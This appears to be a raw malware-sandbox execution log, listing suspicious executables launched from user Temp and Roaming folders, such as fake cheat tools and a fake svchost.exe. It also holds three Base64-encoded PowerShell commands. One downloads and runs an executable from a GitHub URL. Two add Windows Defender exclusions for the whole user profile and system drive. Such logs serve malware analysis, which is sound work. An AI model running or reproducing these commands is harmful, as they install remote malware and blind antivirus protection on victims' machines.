open powershell -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBVAHMAZQByAHMASgBvAGgAbgBEAG8AZQBzAC8AagBlAHIAawAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAHYAMAAvAFcAaQBuAFMAeABTAC4AZQB4AGUAJwAsACAAPAAjAHUAYgB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgB4AGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZABxAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdwBpAG4AcwB4AHMALgBlAHgAZQAnACkAKQA8ACMAaABqAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcgBsAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHAAYwBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuAHMAeABzAC4AZQB4AGUAJwApADwAIwBxAHMAYgAjAD4A"
|
open C:\Users\Rzihfwse\AppData\Local\Temp\refrech3.exe
|
open C:\Users\Onrykltk\AppData\Local\Temp\Vison FREE.exe
|
open C:\Users\Jjgqlhjt\AppData\Local\Temp\Securyt.exe
|
open C:\Users\Nflhzcog\AppData\Local\Temp\Rayd Cheat.exe
|
open powershell -EncodedCommand "PAAjAHYAeABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcwB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAZQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbAB3ACMAPgA="
|
open C:\Users\Lgcrrysk\AppData\Roaming\svchost.exe
|
open C:\Users\Lgcrrysk\AppData\Roaming\subdir.exe
|
open C:\WINDOWS\VISON FREE.exe
|
open C:\Users\Tjgnojwc\AppData\Local\Temp\IMX FREE.exe
|
open C:\Users\Kwrxiugf\AppData\Local\Temp\IMMORTAL.exe
|
open powershell -EncodedCommand "PAAjAHoAcwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAZwB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZgBjACMAPgA="
|
open C:\Users\Xcqunmbw\AppData\Roaming\subdir.exe
|
open C:\Users\Xcqunmbw\AppData\Roaming\system.exe
|